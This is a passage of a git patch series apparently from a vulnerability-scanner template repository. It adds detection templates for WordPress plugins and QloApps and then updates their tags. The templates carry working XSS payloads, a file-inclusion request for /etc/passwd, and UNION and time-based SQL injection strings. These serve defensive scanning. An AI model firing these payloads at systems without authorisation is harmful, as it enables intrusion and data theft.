a/http/cves/2023/CVE-2023-1890.yaml b/http/cves/2023/CVE-2023-1890.yaml new file mode 100644 index 0000000000..ee72893fa9 --- /dev/null +++ b/http/cves/2023/CVE-2023-1890.yaml @@ -0,0 +1,44 @@ +id: CVE-2023-1890 + +info: + name: Tablesome < 1.0.9 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Tablesome before 1.0.9 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + reference: + - https://wpscan.com/vulnerability/8ef64490-30cd-4e07-9b7c-64f551944f3d + - https://wordpress.org/plugins/tablesome/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-1890 + remediation: Fixed in version 1.0.9. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-1890 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2023,wp,wp-plugin,wordpress,authenticated,xss,tablesome + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/edit.php?post_type=tablesome_cpt&a%22%3e%3cscript%3ealert`document.domain`%3c%2fscript%3e HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "")' + - 'contains(body_2, "tablesome")' + condition: and diff --git a/http/cves/2023/CVE-2023-2023.yaml b/http/cves/2023/CVE-2023-2023.yaml new file mode 100644 index 0000000000..7b89d30332 --- /dev/null +++ b/http/cves/2023/CVE-2023-2023.yaml @@ -0,0 +1,44 @@ +id: CVE-2023-2023 + +info: + name: Custom 404 Pro < 3.7.3 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Custom 404 Pro before 3.7.3 is susceptible to cross-site scripting via the search parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: Fixed in version 3.7.3 + reference: + - https://wpscan.com/vulnerability/8859843a-a8c2-4f7a-8372-67049d6ea317 + - https://wordpress.org/plugins/custom-404-pro/advanced/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-2023 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-2023 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2023,xss,wordpress,wp-plugin,authenticated,custom-404-pro + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/admin.php?page=c4p-main&s={{randstr}}%22%20style=animation-name:rotation%20onanimationstart=alert(document.domain)// HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "onanimationstart=alert(document.domain)//")' + - 'contains(body_2, "Custom 404 Pro")' + condition: and diff --git a/http/cves/2023/CVE-2023-2252.yaml b/http/cves/2023/CVE-2023-2252.yaml new file mode 100644 index 0000000000..229a2214db --- /dev/null +++ b/http/cves/2023/CVE-2023-2252.yaml @@ -0,0 +1,42 @@ +id: CVE-2023-2252 + +info: + name: Directorist < 7.5.4 - Local File Inclusion + author: r3Y3r53 + severity: medium + description: | + Directorist before 7.5.4 is susceptible to Local File Inclusion as it does not validate the file parameter when importing CSV files. + remediation: Fixed in version 7.5.4 + reference: + - https://wpscan.com/vulnerability/9da6eede-10d0-4609-8b97-4a5d38fa8e69 + - https://wordpress.org/plugins/directorist/advanced/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-2252 + metadata: + max-request: 2 + verified: true + tags: cve,cve2023,lfi,directorist,wordpress,wp-plugin,wp,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/edit.php?post_type=at_biz_dir&page=tools&step=2&file=%2Fetc%2Fpasswd&delimiter=%3B HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/http/cves/2023/CVE-2023-2272.yaml b/http/cves/2023/CVE-2023-2272.yaml new file mode 100644 index 0000000000..d61fec1bf7 --- /dev/null +++ b/http/cves/2023/CVE-2023-2272.yaml @@ -0,0 +1,46 @@ +id: CVE-2023-2272 + +info: + name: Tiempo.com <= 0.1.2 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Tiempo.com before 0.1.2 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + reference: + - https://wpscan.com/vulnerability/dba60216-2753-40b7-8f2b-6caeba684b2e + - https://wordpress.org/plugins/tiempocom/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-2272 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-2272 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2023,wp,wp-plugin,wordpress,authenticated,xss,tiempocom + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + POST /wp-admin/admin.php?page=tiempocom%2Fapp%2Fadmin.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + page=%22%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "")' + - 'contains(body_2, "Tiempo")' + condition: and diff --git a/http/cves/2023/CVE-2023-30256.yaml b/http/cves/2023/CVE-2023-30256.yaml new file mode 100644 index 0000000000..ce6d92452d --- /dev/null +++ b/http/cves/2023/CVE-2023-30256.yaml @@ -0,0 +1,44 @@ +id: CVE-2023-30256 + +info: + name: Webkul QloApps 1.5.2 - Cross-site Scripting + author: theamanrawat + severity: medium + description: | + Cross Site Scripting vulnerability found in Webkil QloApps v.1.5.2 allows a remote attacker to obtain sensitive information via the back and email_create parameters in the AuthController.php file. + reference: + - https://github.com/webkul/hotelcommerce + - http://packetstormsecurity.com/files/172542/Webkul-Qloapps-1.5.2-Cross-Site-Scripting.html + - https://github.com/ahrixia/CVE-2023-30256 + - https://nvd.nist.gov/vuln/detail/CVE-2023-30256 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-30256 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2023,xss,webkul-qloapps,unauth + +http: + - method: GET + path: + - "{{BaseURL}}/?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(document.domain)%20autofocus%3d%20xss&token=6c62b773f1b284ac4743871b300a0c4d" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "xss onfocus=alert(document.domain) autofocus= xss" + - "hasConfirmation" + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 diff --git a/http/cves/2023/CVE-2023-30777.yaml b/http/cves/2023/CVE-2023-30777.yaml new file mode 100644 index 0000000000..3a90d33596 --- /dev/null +++ b/http/cves/2023/CVE-2023-30777.yaml @@ -0,0 +1,44 @@ +id: CVE-2023-30777 + +info: + name: Advanced Custom Fields < 6.1.6 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Advanced Custom Fields beofre 6.1.6 is susceptible to cross-site scripting via the post_status parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + reference: + - https://wpscan.com/vulnerability/95ded80f-a47b-411e-bd17-050439bf565f + - https://wordpress.org/plugins/advanced-custom-fields/advanced/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-30777 + remediation: Fixed in version 6.1.6. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-30777 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2023,advance-custom-field,wp,wp-plugin,wordpress,authenticated,xss + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/edit.php?post_type=acf-post-type&post_status=%22style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "onanimationstart=alert(document.domain)//")' + - 'contains(body_2, "Advanced Custom Fields")' + condition: and diff --git a/http/cves/2023/CVE-2023-36287.yaml b/http/cves/2023/CVE-2023-36287.yaml new file mode 100644 index 0000000000..eb0ef67c53 --- /dev/null +++ b/http/cves/2023/CVE-2023-36287.yaml @@ -0,0 +1,47 @@ +id: CVE-2023-36287 + +info: + name: Webkul QloApps 1.6.0 - Cross-site Scripting + author: theamanrawat + severity: medium + description: | + An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST controller parameter. + reference: + - https://github.com/webkul/hotelcommerce + - https://flashy-lemonade-192.notion.site/Cross-site-scripting-via-controller-parameter-in-QloApps-1-6-0-97e409ce164f40d195b625b9bf719900 + - https://nvd.nist.gov/vuln/detail/CVE-2023-36287 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-36287 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2023,xss,webkul-qloapps,unauth + +http: + - raw: + - | + POST / HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + controller=change-currency9405'-alert(document.domain)-'&id_currency= + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "'change-currency9405'-alert(document.domain)-'';" + - "customizationIdMessage" + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 diff --git a/http/cves/2023/CVE-2023-36289.yaml b/http/cves/2023/CVE-2023-36289.yaml new file mode 100644 index 0000000000..d7051ea8a8 --- /dev/null +++ b/http/cves/2023/CVE-2023-36289.yaml @@ -0,0 +1,50 @@ +id: CVE-2023-36289 + +info: + name: Webkul QloApps 1.6.0 - Cross-site Scripting + author: theamanrawat + severity: medium + description: | + An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST email_create and back parameter. + reference: + - https://github.com/webkul/hotelcommerce + - https://flashy-lemonade-192.notion.site/Cross-site-scripting-in-POST-Request-via-email_create-and-back-parameter-in-QloApps-1-6-0-e05548203d744daf9047d82fc94b19b7 + - https://nvd.nist.gov/vuln/detail/CVE-2023-36289 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-36289 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2023,xss,webkul-qloapps,unauth + +variables: + email: "{{randstr}}@{{rand_base(5)}}.com" + +http: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + SubmitCreate=1&ajax=true&back=my-account&controller=authentication&email={{email}}&email_create={{email}}"%20onmouseover=alert(document.domain)%20y=&token={{randstr}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'onmouseover=alert(document.domain)' + - 'hasConfirmation' + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 diff --git a/http/exposed-panels/qdpm-login-panel.yaml b/http/exposed-panels/qdpm-login-panel.yaml new file mode 100644 index 0000000000..ca2afd9f4f --- /dev/null +++ b/http/exposed-panels/qdpm-login-panel.yaml @@ -0,0 +1,35 @@ +id: qdpm-login-panel + +info: + name: qdPM Login Panel + author: theamanrawat + severity: info + metadata: + verified: "true" + shodan-query: http.favicon.hash:762074255 + tags: panel,qdpm,login + +http: + - method: GET + path: + - '{{BaseURL}}' + - '{{BaseURL}}/index.php/login' + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'qdPM' + - '/index.php/login/restorePassword' + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 diff --git a/http/vulnerabilities/wordpress/contus-video-gallery-sqli.yaml b/http/vulnerabilities/wordpress/contus-video-gallery-sqli.yaml new file mode 100644 index 0000000000..a4b713cde8 --- /dev/null +++ b/http/vulnerabilities/wordpress/contus-video-gallery-sqli.yaml @@ -0,0 +1,44 @@ +id: contus-video-gallery-sqli + +info: + name: WordPress Video Gallery <= 2.8 - SQL Injection + author: theamanrawat + severity: critical + description: | + The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action (available to unauthenticated users), leading to an SQL injection. + reference: + - https://wpscan.com/vulnerability/b625aee5-8fd1-4f3e-9a9c-d41bdec13243 + - https://wordpress.org/plugins/photo-gallery/ + remediation: Fixed in version 1.6.3 + metadata: + verified: true + tags: sqli,wpscan,wordpress,contus-video-gallery,unauth + +variables: + num: '999999999' + +http: + - raw: + - | + @timeout: 10s + POST /wp-admin/admin-ajax.php?image_id=123 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + action=GalleryBox&filter_tag=1)" union select * from (select 123)a1 join (select 2)a2 join (select 3)a3 join (select 2)a4 join (select 2)a5 join (select 2)a6 join (select 2)a7 join (select 2)a8 join (select 2)a9 join (select 2)a10 join (select 2)a11 join (select 2)a12 join (select 2)a13 join (select 2)a14 join (select 2)a15 join (select 2)a16 join (select 2)a17 join (select 2)a18 join (select version())a19 join (select md5({{num}}))a20 join (select 2)a21 join (select 2)a22 join (select 2)a23-- - + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "c8c605999f3d8352d7bb792cf3fdb25b" + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 diff --git a/http/vulnerabilities/wordpress/leaguemanager-sql-injection.yaml b/http/vulnerabilities/wordpress/leaguemanager-sql-injection.yaml new file mode 100644 index 0000000000..599bc56d83 --- /dev/null +++ b/http/vulnerabilities/wordpress/leaguemanager-sql-injection.yaml @@ -0,0 +1,30 @@ +id: leaguemanager-sql-injection + +info: + name: LeagueManager <= 3.9.11 - SQL Injection + author: theamanrawat + severity: critical + description: | + The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action (available to unauthenticated users), leading to an SQL injection. + reference: + - https://wpscan.com/vulnerability/f3be48f5-ae2c-4e27-80ca-664829b8fba3 + - https://wordpress.org/plugins/leaguemanager/ + metadata: + verified: true + tags: sqli,wp,wp-plugin,wordpress,leaguemanager,unauth + +http: + - raw: + - | + @timeout: 10s + GET /?season=1&league_id=1season=1&league_id=1'+AND+(SELECT+1909+FROM+(SELECT(SLEEP(6)))ZiBf)--+qODp&match_day=1&team_id=1&match_day=1&team_id=1 HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "LeagueManagerAjaxL10n")' + condition: and diff --git a/http/vulnerabilities/wordpress/notificationx-sqli.yaml b/http/vulnerabilities/wordpress/notificationx-sqli.yaml new file mode 100644 index 0000000000..7a6a6c809f --- /dev/null +++ b/http/vulnerabilities/wordpress/notificationx-sqli.yaml @@ -0,0 +1,43 @@ +id: notificationx-sqli + +info: + name: NotificationX < 2.3.12 - SQL Injection + author: theamanrawat + severity: high + description: | + The plugin does not validate and escape the id parameter in its notificationx/v1/notification REST endpoint before using it in a SQL statement, which could allow unauthenticated attackers to perform SQL Injection attacks. + reference: + - https://wpscan.com/vulnerability/d1480717-726d-4be2-95cb-1007a3f010bb + - https://wordpress.org/plugins/notificationx/ + remediation: Fixed in version 2.3.12 + metadata: + verified: true + tags: sqli,wp,wp-plugin,wordpress,notificationx-sql-injection + +http: + - raw: + - | + GET /wp-json/ HTTP/1.1 + Host: {{Hostname}} + + - | + @timeout: 10s + GET /wp-json/notificationx/v1/notification/1?api_key={{md5('{{apikey}}')}}&id[1]=%3d(SELECT/**/1/**/WHERE/**/SLEEP(6)) HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'status_code == 401' + - 'contains(content_type, "application/json")' + - 'contains(body, "There is no notification created with this id")' + condition: and + + extractors: + - type: regex + name: apikey + group: 1 + regex: + - '"home":"(.*?)",' + internal: true diff --git a/http/vulnerabilities/wordpress/zero-spam-sql-injection.yaml b/http/vulnerabilities/wordpress/zero-spam-sql-injection.yaml new file mode 100644 index 0000000000..92da0a19bf --- /dev/null +++ b/http/vulnerabilities/wordpress/zero-spam-sql-injection.yaml @@ -0,0 +1,32 @@ +id: zero-spam-sql-injection + +info: + name: WordPress Zero Spam <= 2.1.1 - Blind SQL Injection + author: theamanrawat + severity: critical + description: | + The WordPress Zero Spam WordPress plugin was affected by an Unauthenticated Blind SQL Injection security vulnerability. + reference: + - https://wpscan.com/vulnerability/44cc8d59-9b45-46b7-afaf-894e4ba62dd5 + - https://wordpress.org/plugins/zero-spam/ + remediation: Fixed in version 2.2.0 + metadata: + verified: true + tags: wp,wp-plugin,wordpress,zero-spam,sqli,unauth + +http: + - raw: + - | + @timeout: 10s + GET / HTTP/1.1 + Host: {{Hostname}} + Client-IP: '+(select(0)from(select(sleep(7)))v)+' + + matchers: + - type: dsl + dsl: + - 'duration>=7' + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "zerospam-js")' + condition: and From 7b99d90f2621ff88689395eaf5ebc4e4112315ba Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 7 Jul 2023 15:32:52 +0530 Subject: [PATCH 2/7] updated tags --- cves/2023/CVE-2023-36346.yaml | 2 +- http/cves/2020/CVE-2020-35984.yaml | 2 +- http/cves/2020/CVE-2020-35986.yaml | 2 +- http/cves/2022/CVE-2022-44947.yaml | 2 +- 4 files changed, 4 insertions(+), 4 deletions(-) diff --git a/cves/2023/CVE-2023-36346.yaml b/cves/2023/CVE-2023-36346.yaml index 2df196adc2..cfcfd7a3bf 100644 --- a/cves/2023/CVE-2023-36346.yaml +++ b/cves/2023/CVE-2023-36346.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: verified: "true" - tags: cve,cve2023,xss,pos,codekop,unauthenticated + tags: cve,cve2023,xss,pos,codekop,unauth requests: - method: GET diff --git a/http/cves/2020/CVE-2020-35984.yaml b/http/cves/2020/CVE-2020-35984.yaml index 9683b3b423..77ae78f15d 100644 --- a/http/cves/2020/CVE-2020-35984.yaml +++ b/http/cves/2020/CVE-2020-35984.yaml @@ -19,7 +19,7 @@ info: verified: "true" shodan-query: http.favicon.hash:-1499940355 max-request: 3 - tags: cve,cve2020,rukovoditel,stored,xss,authenticated + tags: cve,cve2020,rukovoditel,stored-xss,xss,authenticated http: - raw: diff --git a/http/cves/2020/CVE-2020-35986.yaml b/http/cves/2020/CVE-2020-35986.yaml index 60ffd46e2a..a532006a00 100644 --- a/http/cves/2020/CVE-2020-35986.yaml +++ b/http/cves/2020/CVE-2020-35986.yaml @@ -19,7 +19,7 @@ info: verified: "true" shodan-query: http.favicon.hash:-1499940355 max-request: 3 - tags: cve,cve2020,rukovoditel,stored,xss,authenticated + tags: cve,cve2020,rukovoditel,stored-xss,xss,authenticated http: - raw: diff --git a/http/cves/2022/CVE-2022-44947.yaml b/http/cves/2022/CVE-2022-44947.yaml index 897d16e2e4..0b0bce72f2 100644 --- a/http/cves/2022/CVE-2022-44947.yaml +++ b/http/cves/2022/CVE-2022-44947.yaml @@ -18,7 +18,7 @@ info: metadata: verified: true shodan-query: http.favicon.hash:-1499940355 - tags: cve,cve2022,rukovoditel,stored,xss,authenticated + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: - raw: From 7d7e4f43acb9928875999d7c1ec0073d85059e4b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 7 Jul 2023 15:34:00 +0530 Subject: [PATCH 3/7] updated stored tags --- http/cves/2020/CVE-2020-35985.yaml | 2 +- http/cves/2022/CVE-2022-43167.yaml | 2 +- http/cves/2022/CVE-2022-44951.yaml | 2 +- http/cves/2023/CVE-2023-26842.yaml | 2 +- http/cves/2023/CVE-2023-26843.yaml | 2 +- http/cves/2023/CVE-2023-31548.yaml | 2 +- http/vulnerabilities/other/yeswiki-stored-xss.yaml | 2 +- 7 files changed, 7 insertions(+), 7 deletions(-) diff --git a/http/cves/2020/CVE-2020-35985.yaml b/http/cves/2020/CVE-2020-35985.yaml index 6422b35447..06f833058c 100644 --- a/http/cves/2020/CVE-2020-35985.yaml +++ b/http/cves/2020/CVE-2020-35985.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: verified: true - tags: cve,cve2020,rukovoditel,stored,xss,authenticated + tags: cve,cve2020,rukovoditel,stored-xss,xss,authenticated http: - raw: diff --git a/http/cves/2022/CVE-2022-43167.yaml b/http/cves/2022/CVE-2022-43167.yaml index 36d78662c1..c540b4ae99 100644 --- a/http/cves/2022/CVE-2022-43167.yaml +++ b/http/cves/2022/CVE-2022-43167.yaml @@ -19,7 +19,7 @@ info: verified: "true" shodan-query: http.favicon.hash:-1499940355 max-request: 3 - tags: cve,cve2022,rukovoditel,stored,xss,authenticated + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: - raw: - | diff --git a/http/cves/2022/CVE-2022-44951.yaml b/http/cves/2022/CVE-2022-44951.yaml index b88e86034d..f6ced50538 100644 --- a/http/cves/2022/CVE-2022-44951.yaml +++ b/http/cves/2022/CVE-2022-44951.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: verified: true - tags: cve,cve2022,rukovoditel,stored,xss,authenticated + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: - raw: diff --git a/http/cves/2023/CVE-2023-26842.yaml b/http/cves/2023/CVE-2023-26842.yaml index 6c89c80b4d..9cdb305829 100644 --- a/http/cves/2023/CVE-2023-26842.yaml +++ b/http/cves/2023/CVE-2023-26842.yaml @@ -17,7 +17,7 @@ info: metadata: max-request: 2 verified: true - tags: cve,cve2023,churchcrm,stored,xss,authenticated + tags: cve,cve2023,churchcrm,stored-xss,xss,authenticated http: - raw: diff --git a/http/cves/2023/CVE-2023-26843.yaml b/http/cves/2023/CVE-2023-26843.yaml index 6a91a88389..8d281bfca8 100644 --- a/http/cves/2023/CVE-2023-26843.yaml +++ b/http/cves/2023/CVE-2023-26843.yaml @@ -17,7 +17,7 @@ info: metadata: max-request: 2 verified: true - tags: cve,cve2023,churchcrm,stored,xss,authenticated + tags: cve,cve2023,churchcrm,stored-xss,xss,authenticated http: - raw: diff --git a/http/cves/2023/CVE-2023-31548.yaml b/http/cves/2023/CVE-2023-31548.yaml index 0cae8c42fa..29b5ad3781 100644 --- a/http/cves/2023/CVE-2023-31548.yaml +++ b/http/cves/2023/CVE-2023-31548.yaml @@ -17,7 +17,7 @@ info: metadata: max-request: 2 verified: true - tags: cve,cve2023,churchcrm,stored,xss,authenticated + tags: cve,cve2023,churchcrm,stored-xss,xss,authenticated http: - raw: diff --git a/http/vulnerabilities/other/yeswiki-stored-xss.yaml b/http/vulnerabilities/other/yeswiki-stored-xss.yaml index 4327f1b5d4..68c7640bad 100644 --- a/http/vulnerabilities/other/yeswiki-stored-xss.yaml +++ b/http/vulnerabilities/other/yeswiki-stored-xss.yaml @@ -16,7 +16,7 @@ info: max-request: 2 verified: true shodan-query: http.html:"yeswiki" - tags: yeswiki,xss,stored,huntr + tags: yeswiki,xss,stored-xss,huntr http: - raw: From 9bf24ef6866b487fc15eccb7f642bc7566c00c88 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 7 Jul 2023 15:45:56 +0530 Subject: [PATCH 4/7] Update CVE-2023-36346.yaml --- cves/2023/CVE-2023-36346.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2023/CVE-2023-36346.yaml b/cves/2023/CVE-2023-36346.yaml index cfcfd7a3bf..e30965bf9a 100644 --- a/cves/2023/CVE-2023-36346.yaml +++ b/cves/2023/CVE-2023-36346.yaml @@ -1,7 +1,7 @@ id: CVE-2023-36346 info: - name: POS Codekop v2.0 - Cross-site Scripting (Reflected) + name: POS Codekop v2.0 - Cross-site Scripting author: r3Y3r53 severity: medium description: | From 6469c023c4272c56aaa97e42379abd6fa337def8 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 7 Jul 2023 16:03:56 +0530 Subject: [PATCH 5/7] Update CVE-2022-44948.yaml --- http/cves/2022/CVE-2022-44948.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2022/CVE-2022-44948.yaml b/http/cves/2022/CVE-2022-44948.yaml index df5122ae57..90fe854aef 100644 --- a/http/cves/2022/CVE-2022-44948.yaml +++ b/http/cves/2022/CVE-2022-44948.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: verified: true - tags: cve,cve2022,rukovoditel,xss,authenticated + tags: cve,cve2022,rukovoditel,xss,stored-xss,authenticated http: - raw: - | From 993541f0aa4674604bb3ae6e4708bb91199596b8 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 7 Jul 2023 16:18:49 +0530 Subject: [PATCH 6/7] tag - update --- http/cves/2020/CVE-2020-35987.yaml | 2 +- http/cves/2022/CVE-2022-43164.yaml | 2 +- http/cves/2022/CVE-2022-43165.yaml | 2 +- http/cves/2022/CVE-2022-43166.yaml | 2 +- http/cves/2022/CVE-2022-43169.yaml | 2 +- http/cves/2022/CVE-2022-43170.yaml | 2 +- http/cves/2022/CVE-2022-43185.yaml | 2 +- http/cves/2022/CVE-2022-44944.yaml | 2 +- http/cves/2022/CVE-2022-44946.yaml | 2 +- http/cves/2022/CVE-2022-44949.yaml | 2 +- http/cves/2022/CVE-2022-44950.yaml | 2 +- http/cves/2022/CVE-2022-44952.yaml | 2 +- 12 files changed, 12 insertions(+), 12 deletions(-) diff --git a/http/cves/2020/CVE-2020-35987.yaml b/http/cves/2020/CVE-2020-35987.yaml index 14e50a21e4..996f43445c 100644 --- a/http/cves/2020/CVE-2020-35987.yaml +++ b/http/cves/2020/CVE-2020-35987.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: verified: true - tags: cve,cve2020,rukovoditel,xss,authenticated + tags: cve,cve2020,rukovoditel,xss,stored-xss,authenticated http: - raw: diff --git a/http/cves/2022/CVE-2022-43164.yaml b/http/cves/2022/CVE-2022-43164.yaml index 8afb4901bd..a6bb6ff6d1 100644 --- a/http/cves/2022/CVE-2022-43164.yaml +++ b/http/cves/2022/CVE-2022-43164.yaml @@ -19,7 +19,7 @@ info: verified: "true" shodan-query: http.favicon.hash:-1499940355 max-request: 3 - tags: cve,cve2022,rukovoditel,stored,xss,authenticated + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: - raw: diff --git a/http/cves/2022/CVE-2022-43165.yaml b/http/cves/2022/CVE-2022-43165.yaml index f316ac4f11..40009003ab 100644 --- a/http/cves/2022/CVE-2022-43165.yaml +++ b/http/cves/2022/CVE-2022-43165.yaml @@ -18,7 +18,7 @@ info: metadata: verified: true shodan-query: http.favicon.hash:-1499940355 - tags: cve,cve2022,rukovoditel,xss,authenticated + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: - raw: - | diff --git a/http/cves/2022/CVE-2022-43166.yaml b/http/cves/2022/CVE-2022-43166.yaml index 8712f72c85..850177753b 100644 --- a/http/cves/2022/CVE-2022-43166.yaml +++ b/http/cves/2022/CVE-2022-43166.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: verified: true - tags: cve,cve2022,rukovoditel,xss,authenticated + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: - raw: diff --git a/http/cves/2022/CVE-2022-43169.yaml b/http/cves/2022/CVE-2022-43169.yaml index b45ddcd568..7c8ae41874 100644 --- a/http/cves/2022/CVE-2022-43169.yaml +++ b/http/cves/2022/CVE-2022-43169.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: verified: true - tags: cve,cve2022,rukovoditel,xss,authenticated + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: - raw: - | diff --git a/http/cves/2022/CVE-2022-43170.yaml b/http/cves/2022/CVE-2022-43170.yaml index 